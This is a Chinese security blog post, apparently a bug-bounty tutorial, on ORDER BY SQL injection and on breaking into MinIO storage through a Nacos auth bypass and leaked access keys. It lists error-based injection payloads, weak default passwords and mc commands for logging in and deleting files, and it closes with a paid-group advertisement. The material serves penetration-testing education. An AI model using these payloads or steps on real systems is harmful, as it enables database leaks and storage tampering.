文章总结: 文档主要介绍了SQL排序注入的原理和利用方法,以及云安全Minio渗透测试技术。SQL排序注入部分详细解释了如何识别和利用排序功能中的注入点,提供了实用的报错注入语句。Minio渗透测试部分展示了通过Nacos漏洞获取Minio访问凭证的完整流程,并介绍了使用mc工具连接和操作Minio的方法。这些技术对安全研究人员和渗透测试人员具有实用价值。
综合评分: 86
文章分类: 渗透测试,WEB安全,漏洞分析,云安全,实战经验
「企业SRC」SQL排序注入&云安全Minio渗透测试
原创
神农Sec
神农Sec
2025年12月3日 09:02
安徽
扫码加圈子
获内部资料
#
网络安全领域各种资源,EDUSRC证书站挖掘、红蓝攻防、渗透测试等优质文章,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。加内部圈子,文末有彩蛋(知识星球优惠卷)。
#
01
0x1 SQL排序注入&云安全Minio渗透测试
0x1、SQL排序注入
1、浅谈:
在很多web站点中,都提供了对前端界面显示数据的排序功能,而实际中web站点的排序功能基本都是借助SQL语言的order by来实现的,其中的asc为升序排列;desc为降序排列。那么其中大概的SQL语句为SELECT * FROM users ORDER BY 1 desc/asc;这样。而存在排序注入的话,其中可控的便是desc/asc这个位置。
2、排序注入的关键字:
DESC、desc、asc、order
3、SQL排序判断判断:
-
,1
-
,0
-
,sleep(5)
-
,exp(999)
-
,exp(222)
4、实战案例分享:
这个系统可以通过注册游客账号进去,挨个案例点击查看,我的就业功能点查看。
利用1’进行报错验证该查询功能接口,是否存在SQL注入。
然后抓包,使用burpsuit进行测试SQL排序注入漏洞。
这里我给师傅们分享一个排序注入的报错语句,我在很多场景都适用,没有设置过滤,可以试试下面的语句。
updatexml(1,concat(0x7e,(version()),0x7e),1)
extractvalue(1, concat(0x7e, user(), 0x7e))
updatexml(1, concat(0x7c, @@datadir, 0x7c), 1)
extractvalue(1, concat(0x2a, @@version, 0x2a))
上面的这个排序注入就是使用的这个报错语句,直接报错出该系统数据库的版本已经数据库名。
#
0x2、云安全Minio渗透测试
一、Minio简介
-
随着工作和生活中的一些环境逐渐往云端迁移,对象存储的需求也逐渐多了起来,MinIO就是一款支持部署在私有云的开源对象存储系统。MinIO完全兼容AWS S3的协议,也支持作为S3的网关,所以在全球被广泛使用,在Github上已有25k星星。
-
MinIO开放默认的9000端口,外部可以访问,地址为
http://192.168.227.131:9000,但是不知道账号密码. -
在集群模式的配置下,MinIO 部分接口由于信息处理不当返回了所有的环境变量信息(包括
MINIO_SECRET_KEY 和 MINIO_ROOT_PASSWORD),从而导致敏感信息泄漏漏洞,攻击者可能通过获取到的密钥配置信息直接登陆操作 MinIO 接口。 -
我平时会将一些数据部署在MinIO中,在CI、Dockerfile等地方进行使用。
-
感兴趣Minin系统的师傅,可以尝试本地搭建玩下,参考链接:https://www.cnblogs.com/-k8s/p/17555825.html
#
二、Minio渗透测试
开局一个通过dirsearch扫描出来的Nacos目录,直接访问nacos登陆页面。
首先碰到nacos,先尝试下弱口令:
账号:admin、nacos、test
密码:admin、123456、nacos、test
这里弱口令没有成功,直接使用nacos工具一把搜哈即可,大概率都会出漏洞的
直接使用nacos权限绕过漏洞,添加用户成功。
并成功通过注册的用户登陆进去后台。
然后你可以直接在配置列表中的详情里面查看网站的配置信息,然后去挨个找,因为里面都是云安全的一些环境的配置,里面经常会泄露一些云安全的信息key值等,都是可以进行利用的。
后来我在xxxxxxx.yml配置详情里面找到了这个东西,这个也是minio云安全相关的漏洞,下面的url可以访问下,然后要是有回显的话,然后尝试使用下面的access-key和secret-key进行密钥登录。
minio:
access-key: xxxxxxxxxxxx
secret-key: xxxxxxxxxxxxxxxxxxxxxxxx
bucket: xxxxxxxxxx
endpoint: http://xxxxxxx:9000
address: http://xxxxxxx:9000
直接访问配置内容里面的Minion对应的address地址,发现是可以正常访问的:
可以看到这里我直接就登录成功了,且里面都是云空间里面的存储东西,下面可以看到里面的日志信息等。
#
三、mc工具连接Minio
上面的情况是遇到的Minion的URL地址是可以正常访问的,要是遇到访问minio的URL地址,访问不了的情况呢,师傅们就可以尝试下面的这种方法进行连接了,网上很少有相关文章讲解。
选择对应的版本下载即可,mc的下载链接(推荐使用Linux下载使用):https://www.minio.org.cn/download.shtml#/linux
Linux下命令:
[root@centos7 ~]# wget https://dl.minio.org.cn/client/mc/release/linux-amd64/mc
[root@centos7 ~]# chmod +x ./mc
[root@centos7 ~]# ./mc --help
NAME:
mc - MinIO Client for cloud storage and filesystems.
....
使用mc命令连接minion:
./mc alias set myminio minio_address access-key secret-key
可以看到已经使用mc成功添加了minio。
还可以进行文件上传和删除操作:
parallels@ubuntu-linux-2404:~/Desktop$ ./mc cp 2.png myminio/wechat/ //上传文件
parallels@ubuntu-linux-2404:~/Desktop$ ./mc ls myminio/wechat/ //查看文件
11KiB STANDARD 2.png
parallels@ubuntu-linux-2404:~/Desktop$ ./mc rm --force myminio/wechat/2.png //强制删除文件
Removed `myminio/wechat/2.png`.
02
0x2 内部小圈子详情介绍
我们是神农安全,点赞 + 在看 铁铁们点起来,最后祝大家都能心想事成、发大财、行大运。
内部圈子介绍
圈子专注于更新src/红蓝攻防相关:
1、维护更新src专项漏洞知识库,包含原理、挖掘技巧、实战案例2、知识星球专属微信“小圈子交流群”3、微信小群一起挖洞4、内部团队专属EDUSRC证书站漏洞报告5、分享src优质视频课程(企业src/EDUSRC/红蓝队攻防)6、分享src挖掘技巧tips7、不定期有众测、渗透测试项目(一起挣钱)8、不定期有工作招聘内推(工作/护网内推)9、送全国职业技能大赛环境+WP解析(比赛拿奖)10、十个专栏会持续更新~提前续费有优惠,好用不贵很实惠11、每日内部资料分享,内部圈子资料1000+12、联系圈主获取:内部漏洞知识库+圈子使用手册+内部圈子交流群13、VX:routing_love,技术交流+疑问解决
内部圈子专栏介绍
知识星球内部共享资料截屏详情如下
(只要没有特殊情况,每天都保持更新)
知识星球——神农安全
星球现价 ¥50元
如果你觉得应该加入,就不要犹豫,价格只会上涨,不会下跌
星球人数少于1400人 50元/年
星球人数少于1600人 65元/年
(新人优惠卷20,扫码或者私信我即可领取)
欢迎加入星球一起交流,券后价仅50元!!! 即将满1400人涨价
长期更新,更多的0day/1day漏洞POC/EXP
内部知识库–(持续更新中)
知识库部分大纲目录如下:
知识库跟知识星球联动,基本上每天保持更新,满足圈友的需求
知识库和知识星球有师傅们关注的EDUSRC和CNVD相关内容(内部资料)
还有网上流出来的各种SRC/CTF等课程视频
量大管饱,扫描下面的知识星球二维码加入即可
不会挖CNVD?不会挖EDURC?不会挖企业SRC?不会打nday和通杀漏洞?
直接加入我们小圈子:知识星球+内部圈子交流群+知识库
快来吧!!
神农安全知识库内部配置很多内部工具和资料💾,玄机靶场邀请码+EDUSRC邀请码等等
快要护网来临,是不是需要护网面试题汇总?问题+答案(超级详细🔎)
最后,师傅们也是希望找个好工作,那么常见的渗透测试/安服工程师/驻场面试题目,你值得拥有!!!
内部小圈子——圈友反馈(良心价格)
神农安全公开交流群
有需要的师傅们直接扫描文章二维码加入,然后要是后面群聊二维码扫描加入不了的师傅们,直接扫描文章开头的二维码加我(备注加群)
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
往期回顾
手把手js逆向断点调试&js逆向前端加密对抗&企业SRC实战分享
JS漏洞挖掘|分享使用FindSomething联动的挖掘思路
渗透测试 | 从jeecg接口泄露到任意管理员用户接管+SQL注入漏洞
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:神农Sec 神农Sec《「企业SRC」SQL排序注入&云安全Minio渗透测试》